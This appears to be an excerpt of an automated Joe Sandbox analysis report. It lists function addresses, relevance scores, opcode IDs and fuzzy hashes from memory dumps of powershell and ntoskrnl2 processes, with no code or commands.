                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_7ff849310000_ntoskrnl2.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: 2bfc9d1a1a337518c2050059c2e30131252e3fedc26ad745c2eb4e6f8022a74a
                                                                              • Instruction ID: a8dc0b839bd261a22862011327735d7827a1b4a0f9bdafc34be9e04026e74978
                                                                              • Opcode Fuzzy Hash: 2bfc9d1a1a337518c2050059c2e30131252e3fedc26ad745c2eb4e6f8022a74a
                                                                              • Instruction Fuzzy Hash: 47516C70A09A198FDB58EF64C4A5ABE77B2FF58351F55007DD00AEB295CF3A6881CB40
                                                                              Function 00007FF8490A5C68 Relevance: 6.6, Strings: 5, Instructions: 399COMMON
                                                                              Download Yara Rule
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.2131841959.00007FF8490A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF8490A0000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_7ff8490a0000_ntoskrnl2.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: HmI$HmI$HmI$HmI$HmI
                                                                              • API String ID: 0-2512124631
                                                                              • Opcode ID: 5148b5590047e5390a0b02f59784765b10837561a966b647e39651be7a3f21cf
                                                                              • Instruction ID: 210aa3cc9062b9082a9d5a71b7bf6c5532b9764655f4f61a7fdb0a4a6a570a28
                                                                              • Opcode Fuzzy Hash: 5148b5590047e5390a0b02f59784765b10837561a966b647e39651be7a3f21cf
                                                                              • Instruction Fuzzy Hash: 04F12170D1DA999FEB94EF188865AA5B7F1FB68740F0445F9D04CD3682CE38A9C0CB42

                                                                              Executed Functions

                                                                              Function 00007FF848FF6605 Relevance: 7.9, Strings: 6, Instructions: 433COMMON
                                                                              Download Yara Rule
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000014.00000002.3448440300.00007FF848FF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848FF0000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_20_2_7ff848ff0000_powershell.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: (B$I$(B$I$(B$I$(B$I$(B$I$X7l[
                                                                              • API String ID: 0-2010297212
                                                                              • Opcode ID: ca8a8fd9ce3a23acf0b44e1686d4d769523a6aba49be9086475d0a9bbee8f9bf
                                                                              • Instruction ID: 8589024c6a3ec0772910a83d2eec4ac6c3b22b8263c39f2eb84c9ca3b63a93f1
                                                                              • Opcode Fuzzy Hash: ca8a8fd9ce3a23acf0b44e1686d4d769523a6aba49be9086475d0a9bbee8f9bf
                                                                              • Instruction Fuzzy Hash: AFD11031D0EA8A5FEB99EB2898155B5BBA0EF1A354F1801BFD50DCB0D3EE18A805C355
                                                                              Function 00007FF848FF431D Relevance: 5.4, Strings: 4, Instructions: 397COMMON
                                                                              Download Yara Rule
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000014.00000002.3448440300.00007FF848FF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848FF0000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_20_2_7ff848ff0000_powershell.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: (7l[$B$p>$I$p>$I
                                                                              • API String ID: 0-3101510040
                                                                              • Opcode ID: 287a269a7aaf660176388f698de44d52c73e07cc13297c9476390d162eb7c94a
                                                                              • Instruction ID: 6d85685bf4ece9e954c6904e0c4695d7e37bbbe71213919fdcf2c38c5af3d1a6
                                                                              • Opcode Fuzzy Hash: 287a269a7aaf660176388f698de44d52c73e07cc13297c9476390d162eb7c94a
                                                                              • Instruction Fuzzy Hash: 34C1C532D0E7C94FE396EB2858595B47FE1EF62650F0901FBC549CB1E3EA18AC05835A
                                                                              Function 00007FF848FF4073 Relevance: 1.4, Strings: 1, Instructions: 187COMMON
                                                                              Download Yara Rule
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000014.00000002.3448440300.00007FF848FF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848FF0000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_20_2_7ff848ff0000_powershell.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: 8>$I
                                                                              • API String ID: 0-3301367642
                                                                              • Opcode ID: 6eec51d84d2c5f6552b7c66549915884331e133bcd673f6f1e84e6de7c21bda7
                                                                              • Instruction ID: b37d05765e92524ac90644867f14b14e7e1caec7c739efaf5c328dd6322e25a0
                                                                              • Opcode Fuzzy Hash: 6eec51d84d2c5f6552b7c66549915884331e133bcd673f6f1e84e6de7c21bda7
                                                                              • Instruction Fuzzy Hash: 0951F632E0DA4A4FE79AEB2C545157577E2FF65650F1801BBD20EC71D3DF18E8058249
                                                                              Function 00007FF848FF40BF Relevance: 1.4, Strings: 1, Instructions: 100COMMON
                                                                              Download Yara Rule
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000014.00000002.3448440300.00007FF848FF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848FF0000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_20_2_7ff848ff0000_powershell.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: 8>$I
                                                                              • API String ID: 0-3301367642
                                                                              • Opcode ID: c9890d372b035df11cd94309f7f413f871172e50fdb6664f7853c4191a21aa6b
                                                                              • Instruction ID: a7b9c7da0b29a7b2deb16be9ccb38fc7ee982a660f16a178b1d046a248cdedd6
                                                                              • Opcode Fuzzy Hash: c9890d372b035df11cd94309f7f413f871172e50fdb6664f7853c4191a21aa6b
                                                                              • Instruction Fuzzy Hash: FE21D232D0DA864FF3AAEB2C585117466D1FF70690F5901BBD20EC72E2DF28DC058249
                                                                              Function 00007FF848FF43BC Relevance: 1.3, Strings: 1, Instructions: 64COMMON
                                                                              Download Yara Rule
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000014.00000002.3448440300.00007FF848FF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848FF0000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_20_2_7ff848ff0000_powershell.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: p>$I
                                                                              • API String ID: 0-2590420872
                                                                              • Opcode ID: 61e21ac01db96b79fc615f2a6b5d825f45ef158c622bc4e57dbd528849723408
                                                                              • Instruction ID: 0db5fba0060029974bbae91fad31eff0d84943da6a0c2e8a56b6830bfb2fd4b0
                                                                              • Opcode Fuzzy Hash: 61e21ac01db96b79fc615f2a6b5d825f45ef158c622bc4e57dbd528849723408
                                                                              • Instruction Fuzzy Hash: 7B112532D0EA854FE3A4EB2C94945B87BE0FF606A0F4800BBC61DD71D3DB18AC108385
                                                                              Function 00007FF848FF30E9 Relevance: .7, Instructions: 654COMMON
                                                                              Download Yara Rule
                                                                              Memory Dump Source
                                                                              • Source File: 00000014.00000002.3448440300.00007FF848FF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848FF0000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_20_2_7ff848ff0000_powershell.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: 66866f6d03d312e9167dd8de63eba7d778c02cecb2e9f0c48a185fde8507dd17
                                                                              • Instruction ID: 1c7681379cd82cd6561e7e2006fedbe1d28e3dbabcba949a248d1a88d6aec4af
                                                                              • Opcode Fuzzy Hash: 66866f6d03d312e9167dd8de63eba7d778c02cecb2e9f0c48a185fde8507dd17
                                                                              • Instruction Fuzzy Hash: 8A122432E0EB8A0FE396AB2C58555717BE1EF96260F0901FBC14DC71D3DE18AC46835A
                                                                              Function 00007FF848F2A0FB Relevance: .3, Instructions: 255COMMON
                                                                              Download Yara Rule
                                                                              Memory Dump Source
                                                                              • Source File: 00000014.00000002.3429964197.00007FF848F20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F20000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_20_2_7ff848f20000_powershell.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: 20ba617e32491cd57b1f12fdaf083e326206ff7633f66d3ffa406fd844291c4a
                                                                              • Instruction ID: c2bd5291e9ebd1f565a80630865bae09a74fe89e31867869ab5fc3bb7dfb6770
                                                                              • Opcode Fuzzy Hash: 20ba617e32491cd57b1f12fdaf083e326206ff7633f66d3ffa406fd844291c4a
                                                                              • Instruction Fuzzy Hash: E111547690EBC94FD747EB386C650947FB0EF67251B0901E7D488CB0E3DA195848CB52
                                                                              Function 00007FF848FF3360 Relevance: .2, Instructions: 188COMMON
                                                                              Download Yara Rule
                                                                              Memory Dump Source
                                                                              • Source File: 00000014.00000002.3448440300.00007FF848FF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848FF0000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_20_2_7ff848ff0000_powershell.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: 414d44788b83f155f0214f749ec5f90a9acf42e6131a84fa46cbb4f64cd692f0
                                                                              • Instruction ID: b0b7763bfff22b7902a13a9741568fa47b5a63972a36916ad796bbe04ea6ea32
                                                                              • Opcode Fuzzy Hash: 414d44788b83f155f0214f749ec5f90a9acf42e6131a84fa46cbb4f64cd692f0
                                                                              • Instruction Fuzzy Hash: A7511332E1DA8A0FE3A6E72C58941317AD1EFA5790F1901BFC54DC71D3DE29AC45834A
                                                                              Function 00007FF848E0EB80 Relevance: .1, Instructions: 125COMMON
                                                                              Download Yara Rule
                                                                              Memory Dump Source
                                                                              • Source File: 00000014.00000002.3418028752.00007FF848E0D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E0D000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_20_2_7ff848e0d000_powershell.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: 137dc39d98c11c00400417dd1c94844ebe7ffb291e1a8acd41632026e6e3568a
                                                                              • Instruction ID: f003c333e63c4fc4adf68bbc3e4586b336732021fea5ac20c462bc0ef206cb13
                                                                              • Opcode Fuzzy Hash: 137dc39d98c11c00400417dd1c94844ebe7ffb291e1a8acd41632026e6e3568a
                                                                              • Instruction Fuzzy Hash: 5A41273080DBC54FE7669B2898419623FF0FF53360F1505EFD089CB1A3E625A806C792
                                                                              Function 00007FF848F29798 Relevance: .1, Instructions: 118COMMON
                                                                              Download Yara Rule
                                                                              Memory Dump Source
                                                                              • Source File: 00000014.00000002.3429964197.00007FF848F20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F20000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_20_2_7ff848f20000_powershell.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: 651a7aed175b084d36bff4eb9a088b38a1e75e097a94cdf12144fd6c4a3162ea
                                                                              • Instruction ID: d7aeb13d0e18b6662a5c2f5c359094cea244c4b6266a82a6957c68dc1649574a
                                                                              • Opcode Fuzzy Hash: 651a7aed175b084d36bff4eb9a088b38a1e75e097a94cdf12144fd6c4a3162ea
                                                                              • Instruction Fuzzy Hash: 7631D63191CB4C8FDB1CDB5CA806AA97BE0FB98711F00422FE449D3251DB71A855CBC2
                                                                              Function 00007FF848F2A64C Relevance: .1, Instructions: 94COMMON
                                                                              Download Yara Rule
                                                                              Memory Dump Source
                                                                              • Source File: 00000014.00000002.3429964197.00007FF848F20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F20000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_20_2_7ff848f20000_powershell.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: 5c8cdfc662ed9b30561a766dc05a4cedaa8e84a0519917c899d21b2878aff8bf
                                                                              • Instruction ID: 87af3fb7995ac5e2e574ed02b51f6fe0286ea1028c993783685cbb32538e58f6
                                                                              • Opcode Fuzzy Hash: 5c8cdfc662ed9b30561a766dc05a4cedaa8e84a0519917c899d21b2878aff8bf
                                                                              • Instruction Fuzzy Hash: 1D21297080D7C84FEB19DBA89C4AAB97FE4DF53320F04419FD445CB1A3DA695446C761
                                                                              Function 00007FF848F233B5 Relevance: .0, Instructions: 49COMMON
                                                                              Download Yara Rule
                                                                              Memory Dump Source
                                                                              • Source File: 00000014.00000002.3429964197.00007FF848F20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F20000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_20_2_7ff848f20000_powershell.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: 4245d3e889aec3e041d9d8f734bc47effec83d37e61caed90803d2df4b046ffc
                                                                              • Instruction ID: b81149d342438cc37704c2a90a5bc61e4b8c38b5d9d18ebcc6d248958a2491c8
                                                                              • Opcode Fuzzy Hash: 4245d3e889aec3e041d9d8f734bc47effec83d37e61caed90803d2df4b046ffc
                                                                              • Instruction Fuzzy Hash: 6A01677111CB0C4FD744EF0CE451AA5B7E0FB95364F10056EE58AC36A5DB36E892CB46

                                                                              Non-executed Functions

                                                                              Function 00007FF848F284D3 Relevance: 6.4, Strings: 5, Instructions: 129COMMON
                                                                              Download Yara Rule
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000014.00000002.3429964197.00007FF848F20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F20000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_20_2_7ff848f20000_powershell.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: M_^$M_^$M_^$M_^$M_^
                                                                              • API String ID: 0-2396788759
                                                                              • Opcode ID: 5ef0aad2b6934ee31c67883cecf670897a103217fd2375d5e9d194109132f625
                                                                              • Instruction ID: 02df51a1df2120334385b6a1f86d177a838b8fcabcd73fcae9ab770e37d45f97
                                                                              • Opcode Fuzzy Hash: 5ef0aad2b6934ee31c67883cecf670897a103217fd2375d5e9d194109132f625
                                                                              • Instruction Fuzzy Hash: 6F316C63E1DAD28FE35B573C68360E43FD0EF53AA5B5E02E6C0C88B4D3AA195C469215

                                                                              Executed Functions

                                                                              Function 00007FF848FE4073 Relevance: 1.4, Strings: 1, Instructions: 187COMMON
                                                                              Download Yara Rule
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000015.00000002.3421535456.00007FF848FE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848FE0000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_21_2_7ff848fe0000_powershell.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: 8>#I
                                                                              • API String ID: 0-2340899229
                                                                              • Opcode ID: 7f76176a1a17c866d8d1a43f81b4f3eda84a0290477da74680ac771ab8fa8f3c
                                                                              • Instruction ID: ccecbd7d68f109b8b1d0b9ad53d652c4c1d7efb3c022c0d95da6b403473c0f1a
                                                                              • Opcode Fuzzy Hash: 7f76176a1a17c866d8d1a43f81b4f3eda84a0290477da74680ac771ab8fa8f3c
                                                                              • Instruction Fuzzy Hash: A351B232A0DE8A4FEB9AAB2C941167577D2FFA5660F5801BEC14EC71D2DE1CE8058249
                                                                              Function 00007FF848FE4370 Relevance: 1.4, Strings: 1, Instructions: 148COMMON
                                                                              Download Yara Rule
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000015.00000002.3421535456.00007FF848FE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848FE0000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_21_2_7ff848fe0000_powershell.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: p>#I
                                                                              • API String ID: 0-3576117583
                                                                              • Opcode ID: d7373624c1305fc7d9e30b14c8fc87a0042d0b89b9fa8e5ffc76136b4abec123
                                                                              • Instruction ID: 1eb64e07844be2ab5fe99ae7be50bb6f91f8d2976cde567290cc41a6828b30f3
                                                                              • Opcode Fuzzy Hash: d7373624c1305fc7d9e30b14c8fc87a0042d0b89b9fa8e5ffc76136b4abec123
                                                                              • Instruction Fuzzy Hash: 38410332E0DE494FE7A9EB2864116B57BE1EF64660F0801BEC54EC75C7EB1CAC118395
                                                                              Function 00007FF848FE40BF Relevance: 1.4, Strings: 1, Instructions: 100COMMON
                                                                              Download Yara Rule
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000015.00000002.3421535456.00007FF848FE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848FE0000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_21_2_7ff848fe0000_powershell.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: 8>#I
                                                                              • API String ID: 0-2340899229
                                                                              • Opcode ID: d727f15db29681802b1cece53ab64a1f0304bf0dd0695f78894e994a13521e1b
                                                                              • Instruction ID: 9ce6a0af70269b8d400e3e01e0dd14b6ac667ba9a943d92f4ed8af87854f0b8e
                                                                              • Opcode Fuzzy Hash: d727f15db29681802b1cece53ab64a1f0304bf0dd0695f78894e994a13521e1b
                                                                              • Instruction Fuzzy Hash: A521AE32D0DE864FEBAAEB28985117466D2FF74690F5901BEC10EC71E2DF2CDC058249
                                                                              Function 00007FF848FE43BC Relevance: 1.3, Strings: 1, Instructions: 64COMMON
                                                                              Download Yara Rule
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000015.00000002.3421535456.00007FF848FE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848FE0000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_21_2_7ff848fe0000_powershell.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: p>#I
                                                                              • API String ID: 0-3576117583
                                                                              • Opcode ID: 7c1cde8e4732a5ea809411f2705334de4b981a87cac72fab9f8bc39076075270
                                                                              • Instruction ID: aa3c771c08f87c77ec571f5b69374a2f4c7ac74aff7df83f1862d5067c6a0b11
                                                                              • Opcode Fuzzy Hash: 7c1cde8e4732a5ea809411f2705334de4b981a87cac72fab9f8bc39076075270
                                                                              • Instruction Fuzzy Hash: C911C232E0EE854FE7A4EB2898545B87BD1FF606A0F4901BED45DC75D2DB1CAC108395
                                                                              Function 00007FF848FE6838 Relevance: 1.3, Strings: 1, Instructions: 47COMMON
                                                                              Download Yara Rule
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000015.00000002.3421535456.00007FF848FE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848FE0000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_21_2_7ff848fe0000_powershell.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: (B#I
                                                                              • API String ID: 0-2255851318
                                                                              • Opcode ID: 1376ce26925d0f30d77d1a774733a7ce8e1edc4aa270d5e02fcb167953c39c78
                                                                              • Instruction ID: f79e91b651bda41bfffed27fb7600aad75275dbfa9ada48161e2d2bd5e1ec52d
                                                                              • Opcode Fuzzy Hash: 1376ce26925d0f30d77d1a774733a7ce8e1edc4aa270d5e02fcb167953c39c78
                                                                              • Instruction Fuzzy Hash: 6B01D132E0EA88DFEB69EBA864551B8BB90EF59760F1800BFC14DD7093EA181841C355
                                                                              Function 00007FF848FE6858 Relevance: 1.3, Strings: 1, Instructions: 33COMMON
                                                                              Download Yara Rule
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000015.00000002.3421535456.00007FF848FE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848FE0000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_21_2_7ff848fe0000_powershell.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: (B#I
                                                                              • API String ID: 0-2255851318
                                                                              • Opcode ID: 96fd087f581ac7dc23501b2b6205172e76058b9c5192f60940cc7be0a13374b9
                                                                              • Instruction ID: 86178001a3601d8d3b211cb5c0267eb6117e83201d2fa7eff90fb0db0b6d691a
                                                                              • Opcode Fuzzy Hash: 96fd087f581ac7dc23501b2b6205172e76058b9c5192f60940cc7be0a13374b9
                                                                              • Instruction Fuzzy Hash: 8EF02732D0E688DFEB15EBA864450FCFB90EF15761F1800BFD00DE2083EA291850C315
                                                                              Function 00007FF848DFE8E0 Relevance: .1, Instructions: 126COMMON
                                                                              Download Yara Rule
                                                                              Memory Dump Source
                                                                              • Source File: 00000015.00000002.3393590363.00007FF848DFD000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848DFD000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_21_2_7ff848dfd000_powershell.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: 3a4264e1f9d4386e7854c1b703e78a06845c38d92f8f739053f4cf99bed8f4ff
                                                                              • Instruction ID: b920f646b25fdbb2a20f4ba79158591bc2782bb930c7ad6908134db77a3aec0e
                                                                              • Opcode Fuzzy Hash: 3a4264e1f9d4386e7854c1b703e78a06845c38d92f8f739053f4cf99bed8f4ff
                                                                              • Instruction Fuzzy Hash: FE41287180EBC44FE7569B399845A623FF0EF56360B1505EFD088CB1A3D725A849C7A2
                                                                              Function 00007FF848F1B1FA Relevance: .1, Instructions: 121COMMON
                                                                              Download Yara Rule
                                                                              Memory Dump Source
                                                                              • Source File: 00000015.00000002.3406360980.00007FF848F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F10000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_21_2_7ff848f10000_powershell.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: 2b27b931b1ebbcef8bf343c18248422fbb25f33804e9d2ce81deb17e5796525c
                                                                              • Instruction ID: 82d5f05cd0b12a9e7b736f9911087e6a0d19c39fd7d8c0c4edf88d980b20569f
                                                                              • Opcode Fuzzy Hash: 2b27b931b1ebbcef8bf343c18248422fbb25f33804e9d2ce81deb17e5796525c
                                                                              • Instruction Fuzzy Hash: B9310931A1DA984FDB55DB6CAC497EDBBE0EFA5321F08417FC048C7192D621580AC791
                                                                              Function 00007FF848F19798 Relevance: .1, Instructions: 116COMMON
                                                                              Download Yara Rule
                                                                              Memory Dump Source
                                                                              • Source File: 00000015.00000002.3406360980.00007FF848F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F10000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_21_2_7ff848f10000_powershell.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: 1090f37e64abb5ff671fe860088b9da12fcd885e9c754cfa323afc779d9fa538
                                                                              • Instruction ID: 25a8998e4731c61174fe57864e3383772fd27e81e386fdd8d50079c72f24407e
                                                                              • Opcode Fuzzy Hash: 1090f37e64abb5ff671fe860088b9da12fcd885e9c754cfa323afc779d9fa538
                                                                              • Instruction Fuzzy Hash: D131C63191CB4C9FDB18DB5CA8066A97BE0FB99311F00422FE449D3651DB74A855CBC2
                                                                              Function 00007FF848F1C2C5 Relevance: .1, Instructions: 90COMMON
                                                                              Download Yara Rule
                                                                              Memory Dump Source
                                                                              • Source File: 00000015.00000002.3406360980.00007FF848F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F10000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_21_2_7ff848f10000_powershell.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: 3a580b32e4b33a9b31b8e2cd47d9f7171b25502d5542b17026520eb4d4c9705b
                                                                              • Instruction ID: 2b5084c8bbe91c1f5fbfd3f9199372a0dbb2a886b3042900534903f2fc50fb6b
                                                                              • Opcode Fuzzy Hash: 3a580b32e4b33a9b31b8e2cd47d9f7171b25502d5542b17026520eb4d4c9705b
                                                                              • Instruction Fuzzy Hash: C7215A30A1C94D8FDF94EB58C445EED77A1FF68344F1401AAD40AD7296DA28EC82CBC1
                                                                              Function 00007FF848F133B5 Relevance: .0, Instructions: 49COMMON
                                                                              Download Yara Rule
                                                                              Memory Dump Source
                                                                              • Source File: 00000015.00000002.3406360980.00007FF848F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F10000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_21_2_7ff848f10000_powershell.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: 67d1617613e612b7a049b31fcb3c0c06bb00aa9b6616606570c7eb9b15762ca9
                                                                              • Instruction ID: 191617ceee889ec1b776a361fbb2d1250ce1ead809f4672e64413ffe75dfec08
                                                                              • Opcode Fuzzy Hash: 67d1617613e612b7a049b31fcb3c0c06bb00aa9b6616606570c7eb9b15762ca9
                                                                              • Instruction Fuzzy Hash: 7201677111CB0C4FDB44EF0CE451AA5B7E0FB95364F10056EE58AC3695DB36E882CB45
                                                                              Function 00007FF848F1A2C9 Relevance: .0, Instructions: 26COMMON
                                                                              Download Yara Rule
                                                                              Memory Dump Source
                                                                              • Source File: 00000015.00000002.3406360980.00007FF848F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F10000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_21_2_7ff848f10000_powershell.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: a96d8351abdaf36b9a5b2e85aa1065bc987d2f59ab3da8b03a551874f7536abd
                                                                              • Instruction ID: 761615c01e1d9118afdf30b1e274292361a62f1f5cc8e16f811fac4fe3cbecc4
                                                                              • Opcode Fuzzy Hash: a96d8351abdaf36b9a5b2e85aa1065bc987d2f59ab3da8b03a551874f7536abd
                                                                              • Instruction Fuzzy Hash: E8E04835808A4C8FCB54EF18D4598E57BE0FF64301F00029BE80DC7161D7719954CBC1

                                                                              Non-executed Functions

                                                                              Function 00007FF848F184E3 Relevance: 6.4, Strings: 5, Instructions: 119COMMON
                                                                              Download Yara Rule
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000015.00000002.3406360980.00007FF848F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F10000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_21_2_7ff848f10000_powershell.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: N_^$N_^$N_^$N_^$N_^
                                                                              • API String ID: 0-2528851458
                                                                              • Opcode ID: b600ff3345d2ebd83c415ab42d42de6d242852f2d2cfc35dc5d05000d7d4abc7
                                                                              • Instruction ID: 473d3cec803082ad67dd006b0767732031560009671cc587bcf8618181eacec8
                                                                              • Opcode Fuzzy Hash: b600ff3345d2ebd83c415ab42d42de6d242852f2d2cfc35dc5d05000d7d4abc7
                                                                              • Instruction Fuzzy Hash: 15316267E1EAD25FE35B57386D750E02F91EF637A5B4D00EAC1D84B0D3EE085C069206
                                                                              Function 00007FF848FE66E0 Relevance: 5.3, Strings: 4, Instructions: 296COMMON
                                                                              Download Yara Rule
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000015.00000002.3421535456.00007FF848FE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848FE0000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_21_2_7ff848fe0000_powershell.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: (B#I$(B#I$(B#I$(B#I
                                                                              • API String ID: 0-1994586140
                                                                              • Opcode ID: e041f13f1190eb8bf7e178c44b632d4c290aeb199391d0491e7f92123935230d
                                                                              • Instruction ID: 852b9f814e868e2acacc8566486a4cd7ce0af88253c0734dfdc73db4d94dceec
                                                                              • Opcode Fuzzy Hash: e041f13f1190eb8bf7e178c44b632d4c290aeb199391d0491e7f92123935230d
                                                                              • Instruction Fuzzy Hash: 4D910070E1EA8E5FEB99AB2898545B5BBA1EF15390F1401BAE40DC71D3EF1CA801C355

                                                                              Executed Functions

                                                                              Function 00007FF848FD6605 Relevance: 7.9, Strings: 6, Instructions: 436COMMON
                                                                              Download Yara Rule
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000017.00000002.3361551889.00007FF848FD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848FD0000, based on PE: false
